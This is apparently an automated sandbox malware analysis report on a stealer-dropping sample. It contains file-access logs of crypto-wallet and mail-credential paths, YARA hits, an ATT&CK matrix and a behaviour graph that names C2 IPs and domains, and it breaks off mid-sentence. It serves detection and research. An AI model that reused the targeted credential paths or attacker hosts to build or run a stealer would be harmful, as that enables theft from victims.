                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                  Source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                                  Source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                                  Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                                  Source: Yara matchFile source: 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000023.00000002.3153539765.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5580, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hjhTHr6fWy.exe PID: 1856, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR

                                  Remote Access Functionality

                                  barindex
                                  Source: Yara matchFile source: 00000016.00000002.2960319681.0000000003119000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000018.00000000.2860928710.0000000000CA2000.00000002.00000001.01000000.00000019.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: 7.2.gold.exe.37a5570.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 31.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 15.0.hjhTHr6fWy.exe.980000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.gold.exe.37a5570.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.436080.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.436080.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 27.2.crypted.exe.39e5570.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 35.0.newbundle2.exe.c20000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 13.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000002.2695505270.00000000037A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.2858375876.0000000000421000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000023.00000000.2951592112.0000000000C41000.00000002.00000001.01000000.00000022.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000001F.00000002.3088502787.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000F.00000000.2743413238.0000000000982000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000D.00000002.2744142845.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: gold.exe PID: 2972, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5580, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1712, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: hjhTHr6fWy.exe PID: 1856, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: penis.exe PID: 7152, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: crypted.exe PID: 2956, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6472, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Roaming\hjhTHr6fWy.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\newbundle2[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000322001\newbundle2.exe, type: DROPPED
                                  Source: Yara matchFile source: 00000017.00000002.3340691563.000000000279D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: fidovideorecorder32_64.exe PID: 3288, type: MEMORYSTR
                                  Source: Yara matchFile source: 19.0.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.30ea4b9.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3740000.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3710000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3710000.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.30ea4b9.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 22.2.needmoney.exe.3740000.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 19.2.stealc_default2.exe.f50000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000020.00000002.3006538986.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000013.00000000.2774274390.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000013.00000002.2996521135.0000000000F51000.00000080.00000001.01000000.00000012.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2972396756.0000000003740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2971489446.0000000003710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\stealc_default2[1].exe, type: DROPPED
                                  Source: Yara matchFile source: dump.pcap, type: PCAP
                                  Source: Yara matchFile source: Process Memory Space: stealc_default2.exe PID: 528, type: MEMORYSTR
                                  Source: Yara matchFile source: 37.2.InstallUtil.exe.800000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 36.2.rstxdhuj.exe.4141590.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 36.2.rstxdhuj.exe.418fdb0.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000024.00000002.3118723302.0000000004141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000025.00000002.3332091327.0000000000802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000024.00000002.3009810672.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 24.0.penis.exe.ca0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\penis[1].exe, type: DROPPED
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1000254001\penis.exe, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001BEAA8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,16_2_001BEAA8
                                  Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exeCode function: 16_2_001BDDB1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,16_2_001BDDB1
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0023EAA8 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::ReleaseInternalContext,17_2_0023EAA8
                                  Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exeCode function: 17_2_0023DDB1 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,17_2_0023DDB1
                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                                  Windows Management Instrumentation
                                  1
                                  DLL Side-Loading
                                  1
                                  DLL Side-Loading
                                  1
                                  Disable or Modify Tools
                                  2
                                  OS Credential Dumping
                                  2
                                  System Time Discovery
                                  Remote Services11
                                  Archive Collected Data
                                  12
                                  Ingress Tool Transfer
                                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomainsDefault Accounts1
                                  Native API
                                  1
                                  Windows Service
                                  1
                                  Windows Service
                                  111
                                  Deobfuscate/Decode Files or Information
                                  11
                                  Input Capture
                                  1
                                  Account Discovery
                                  Remote Desktop Protocol4
                                  Data from Local System
                                  11
                                  Encrypted Channel
                                  Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts1
                                  Shared Modules
                                  1
                                  Scheduled Task/Job
                                  512
                                  Process Injection
                                  5
                                  Obfuscated Files or Information
                                  Security Account Manager3
                                  File and Directory Discovery
                                  SMB/Windows Admin Shares1
                                  Email Collection
                                  1
                                  Non-Standard Port
                                  Automated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  Command and Scripting Interpreter
                                  11
                                  Registry Run Keys / Startup Folder
                                  1
                                  Scheduled Task/Job
                                  1
                                  Install Root Certificate
                                  NTDS359
                                  System Information Discovery
                                  Distributed Component Object Model11
                                  Input Capture
                                  3
                                  Non-Application Layer Protocol
                                  Traffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud Accounts1
                                  Scheduled Task/Job
                                  Network Logon Script11
                                  Registry Run Keys / Startup Folder
                                  33
                                  Software Packing
                                  LSA Secrets10101
                                  Security Software Discovery
                                  SSH2
                                  Clipboard Data
                                  124
                                  Application Layer Protocol
                                  Scheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable Media1
                                  PowerShell
                                  RC ScriptsRC Scripts1
                                  Timestomp
                                  Cached Domain Credentials2
                                  Process Discovery
                                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                  DLL Side-Loading
                                  DCSync481
                                  Virtualization/Sandbox Evasion
                                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                                  Masquerading
                                  Proc Filesystem1
                                  Application Window Discovery
                                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt481
                                  Virtualization/Sandbox Evasion
                                  /etc/passwd and /etc/shadow3
                                  System Owner/User Discovery
                                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron512
                                  Process Injection
                                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1520057 Sample: file.exe Startdate: 27/09/2024 Architecture: WINDOWS Score: 100 115 vozmeatillu.shop 2->115 117 stogeneratmns.shop 2->117 119 13 other IPs or domains 2->119 151 Multi AV Scanner detection for domain / URL 2->151 153 Suricata IDS alerts for network traffic 2->153 155 Found malware configuration 2->155 157 30 other signatures 2->157 9 axplong.exe 2 55 2->9         started        14 file.exe 5 2->14         started        16 Hkbsse.exe 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 127 185.215.113.16, 49710, 49712, 49715 WHOLESALECONNECTIONSNL Portugal 9->127 129 185.215.113.26, 49716, 49721, 49726 WHOLESALECONNECTIONSNL Portugal 9->129 135 3 other IPs or domains 9->135 99 C:\Users\user\AppData\Local\Temp\...\neon.exe, PE32+ 9->99 dropped 101 C:\Users\user\AppData\...\2a8f2f9086.exe, PE32 9->101 dropped 103 C:\Users\user\AppData\...\c9a37ab27e.exe, PE32 9->103 dropped 113 25 other malicious files 9->113 dropped 197 Creates multiple autostart registry keys 9->197 199 Hides threads from debuggers 9->199 201 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->201 20 stealc_default2.exe 9->20         started        25 12dsvc.exe 9->25         started        27 gold.exe 2 9->27         started        35 8 other processes 9->35 105 C:\Users\user\AppData\Local\...\axplong.exe, PE32 14->105 dropped 107 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 14->107 dropped 203 Detected unpacking (changes PE section rights) 14->203 205 Tries to evade debugger and weak emulator (self modifying code) 14->205 207 Tries to detect virtualization through RDTSC time measurements 14->207 209 Potentially malicious time measurement code found 14->209 29 axplong.exe 14->29         started        131 176.113.115.95, 49724, 80 SELECTELRU Russian Federation 16->131 109 C:\Users\user\AppData\Local\...\stories.exe, PE32 16->109 dropped 111 C:\Users\user\AppData\...\stories[1].exe, PE32 16->111 dropped 31 stories.exe 16->31         started        133 127.0.0.1 unknown unknown 18->133 211 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->211 33 WerFault.exe 18->33         started        file6 signatures7 process8 dnsIp9 121 185.215.113.17, 49722, 80 WHOLESALECONNECTIONSNL Portugal 20->121 71 C:\Users\user\AppData\...\softokn3[1].dll, PE32 20->71 dropped 73 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 20->73 dropped 75 C:\Users\user\AppData\...\mozglue[1].dll, PE32 20->75 dropped 85 9 other files (5 malicious) 20->85 dropped 159 Tries to steal Mail credentials (via file / registry access) 20->159 161 Found many strings related to Crypto-Wallets (likely being stolen) 20->161 163 Tries to harvest and steal ftp login credentials 20->163 177 3 other signatures 20->177 179 3 other signatures 25->179 37 RegAsm.exe 25->37         started        41 conhost.exe 25->41         started        165 Contains functionality to inject code into remote processes 27->165 43 RegAsm.exe 6 24 27->43         started        46 conhost.exe 27->46         started        167 Detected unpacking (changes PE section rights) 29->167 169 Tries to detect sandboxes and other dynamic analysis tools (window names) 29->169 181 5 other signatures 29->181 77 C:\Users\user\AppData\Local\...\stories.tmp, PE32 31->77 dropped 48 stories.tmp 31->48         started        123 185.215.113.67 WHOLESALECONNECTIONSNL Portugal 35->123 125 google.com 142.250.186.174 GOOGLEUS United States 35->125 79 C:\Users\user\AppData\Roaming\Ylrdnrwcx.exe, PE32 35->79 dropped 81 C:\Users\user\AppData\...\svchost015.exe, PE32 35->81 dropped 83 C:\Users\user\AppData\Local\...\Hkbsse.exe, PE32 35->83 dropped 171 Queries sensitive video device information (via WMI, 